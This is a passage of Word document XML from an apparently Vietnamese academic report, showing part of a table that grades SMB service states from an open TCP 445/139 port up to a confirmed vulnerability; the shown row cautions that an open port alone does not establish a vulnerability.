        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>từ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>trạng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>thái</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>mở</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>cổng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> sang </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>kết</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>luận</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>có</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>lỗ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>hổng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Để</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>đảm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>bảo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>tính</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>khoa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>học</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>và</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>chính</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>xác</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>đề</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>tài</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>phân</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>định</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>cấp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>độ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>trạng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>thái</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>kỹ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>thuật</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>tăng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>dần</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>theo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Bảng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1.5.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F7ED16" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRPr="009A434D" w:rsidRDefault="00000000">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160" w:after="60"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Bảng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1.5: Khung </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>phân</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>định</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> 4 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>cấp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>độ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>trạng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>thái</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>dịch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>vụ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>và</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>lỗ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>hổng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009A434D">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> SMB.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1219"/>
        <w:gridCol w:w="1343"/>
        <w:gridCol w:w="3680"/>
        <w:gridCol w:w="1415"/>
        <w:gridCol w:w="1343"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DB6619" w14:paraId="1E6CDD40" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF2FA"/>
          </w:tcPr>
          <w:p w14:paraId="1A4F39D0" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Cấp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>độ</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF2FA"/>
          </w:tcPr>
          <w:p w14:paraId="6C69ABB7" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Tên gọi kỹ thuật</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF2FA"/>
          </w:tcPr>
          <w:p w14:paraId="2CED6C70" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Dấu hiệu quan sát thực tế</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF2FA"/>
          </w:tcPr>
          <w:p w14:paraId="2B65E054" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Ý nghĩa an ninh kỹ thuật</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF2FA"/>
          </w:tcPr>
          <w:p w14:paraId="7E5BAF9C" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Giới hạn kết luận</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="73E86D74" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5170912D" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Cấp độ 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="667E5CA3" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Khả năng tiếp cận dịch vụ SMB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="18B4CBA2" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Cổng TCP 445 hoặc TCP 139 ở trạng thái </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>open</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> qua quét TCP SYN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6AF4C756" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Cổng mạng đang có dịch vụ lắng nghe; cần thực hiện </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>nhận diện dịch vụ để xác nhận</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4B902501" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Chưa thể kết luận lỗ hổng.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> Đây là trạng thái mở </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>cổng mạng, chưa khẳng định cấu hình dịch vụ</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="0F76CE9B" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
